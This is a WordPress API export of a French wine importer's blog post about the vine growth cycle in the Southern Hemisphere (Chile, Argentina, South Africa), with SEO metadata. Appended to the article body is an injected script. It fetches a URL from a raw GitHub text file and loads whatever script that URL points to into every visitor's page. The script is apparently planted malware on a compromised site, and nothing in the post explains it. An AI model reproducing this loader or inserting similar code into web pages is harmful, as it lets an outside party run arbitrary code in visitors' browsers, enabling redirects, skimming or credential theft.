{"id":3755,"date":"2018-09-18T10:48:33","date_gmt":"2018-09-18T09:48:33","guid":{"rendered":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?p=3755"},"modified":"2024-10-29T14:26:45","modified_gmt":"2024-10-29T13:26:45","slug":"cycle-vegetatif","status":"publish","type":"post","link":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/","title":{"rendered":"Le cycle v\u00e9g\u00e9tatif dans l&rsquo;H\u00e9misph\u00e8re Sud"},"content":{"rendered":"<h2 style=\"text-align: justify;\">Quel est le cycle v\u00e9g\u00e9tatif de la vigne dans l&rsquo;H\u00e9misph\u00e8re Sud\u00a0?<\/h2>\n<p style=\"text-align: justify;\">Grande question qui vient \u00e0 l&rsquo;esprit de chacun \u00e0 chaque fois que l&rsquo;on \u00e9voque les vins de l&rsquo;h\u00e9misph\u00e8re sud. On va de suite mettre fin au fantasme de la double vendange au Chili, en Argentine ou encore en Afrique du Sud. Les vignobles de ces pays sont situ\u00e9s aux m\u00eame latitudes que nos vignobles europ\u00e9ens et donc avec des climats peu ou pas diff\u00e9rents.<\/p>\n<p style=\"text-align: justify;\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-3762\" src=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/cycle-v\u00e9g\u00e9tatif-2.jpg\" alt=\"cycle v\u00e9g\u00e9tatif 2\" width=\"800\" height=\"800\" srcset=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/cycle-v\u00e9g\u00e9tatif-2.jpg 800w, https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/cycle-v\u00e9g\u00e9tatif-2-150x150.jpg 150w, https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/cycle-v\u00e9g\u00e9tatif-2-300x300.jpg 300w, https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/cycle-v\u00e9g\u00e9tatif-2-768x768.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Quel est le cycle v\u00e9g\u00e9tatif de la vigne dans l&rsquo;H\u00e9misph\u00e8re Sud\u00a0? Grande question qui vient \u00e0 l&rsquo;esprit de chacun \u00e0 chaque fois que l&rsquo;on \u00e9voque les vins de l&rsquo;h\u00e9misph\u00e8re sud. On va de suite mettre fin au fantasme de la double vendange au Chili, en Argentine ou encore en Afrique du Sud. Les vignobles de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3807,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_lmt_disableupdate":"","_lmt_disable":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[13,4,9,17],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !<\/title>\n<meta name=\"description\" content=\"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l&#039;h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !\" \/>\n<meta property=\"og:description\" content=\"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l&#039;h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !\" \/>\n<meta property=\"og:url\" content=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/ContinentDuVin\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-09-18T09:48:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-29T13:26:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095-1024x683.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"683\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Continent du Vin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Continent du Vin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/\",\"name\":\"Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !\",\"isPartOf\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg\",\"datePublished\":\"2018-09-18T09:48:33+00:00\",\"dateModified\":\"2024-10-29T13:26:45+00:00\",\"author\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\"},\"description\":\"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l'h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !\",\"breadcrumb\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage\",\"url\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg\",\"contentUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg\",\"width\":3888,\"height\":2592},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Le cycle v\u00e9g\u00e9tatif dans l&rsquo;H\u00e9misph\u00e8re Sud\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\",\"name\":\"\",\"description\":\"Importateur de Vins du Monde depuis 2004\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\",\"name\":\"Continent du Vin\",\"description\":\"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+\",\"sameAs\":[\"http:\/\/www.continentduvin.fr\",\"https:\/\/www.facebook.com\/ContinentDuVin\/\"],\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !","description":"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l'h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/","og_locale":"fr_FR","og_type":"article","og_title":"Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !","og_description":"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l'h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !","og_url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/","article_author":"https:\/\/www.facebook.com\/ContinentDuVin\/","article_published_time":"2018-09-18T09:48:33+00:00","article_modified_time":"2024-10-29T13:26:45+00:00","og_image":[{"width":1024,"height":683,"url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095-1024x683.jpg","type":"image\/jpeg"}],"author":"Continent du Vin","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Continent du Vin","Dur\u00e9e de lecture estim\u00e9e":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/","name":"Le cycle v\u00e9g\u00e9tatif en H\u00e9misph\u00e8re Sud : Tamari et Stellenrust !","isPartOf":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website"},"primaryImageOfPage":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage"},"image":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage"},"thumbnailUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg","datePublished":"2018-09-18T09:48:33+00:00","dateModified":"2024-10-29T13:26:45+00:00","author":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc"},"description":"Connaissez-vous les p\u00e9riodes du cycle v\u00e9g\u00e9tatif sur l'h\u00e9misph\u00e8re Sud ? Et plus pr\u00e9cis\u00e9ment en Argentine et en Afrique du Sud !","breadcrumb":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#primaryimage","url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg","contentUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2018\/09\/afrique-du-sud-095.jpg","width":3888,"height":2592},{"@type":"BreadcrumbList","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/cycle-vegetatif\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/"},{"@type":"ListItem","position":2,"name":"Le cycle v\u00e9g\u00e9tatif dans l&rsquo;H\u00e9misph\u00e8re Sud"}]},{"@type":"WebSite","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/","name":"","description":"Importateur de Vins du Monde depuis 2004","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc","name":"Continent du Vin","description":"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+","sameAs":["http:\/\/www.continentduvin.fr","https:\/\/www.facebook.com\/ContinentDuVin\/"],"url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/"}]}},"modified_by":"Continent du Vin","_links":{"self":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/3755"}],"collection":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/comments?post=3755"}],"version-history":[{"count":1,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/3755\/revisions"}],"predecessor-version":[{"id":14900,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/3755\/revisions\/14900"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media\/3807"}],"wp:attachment":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media?parent=3755"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/categories?post=3755"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/tags?post=3755"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}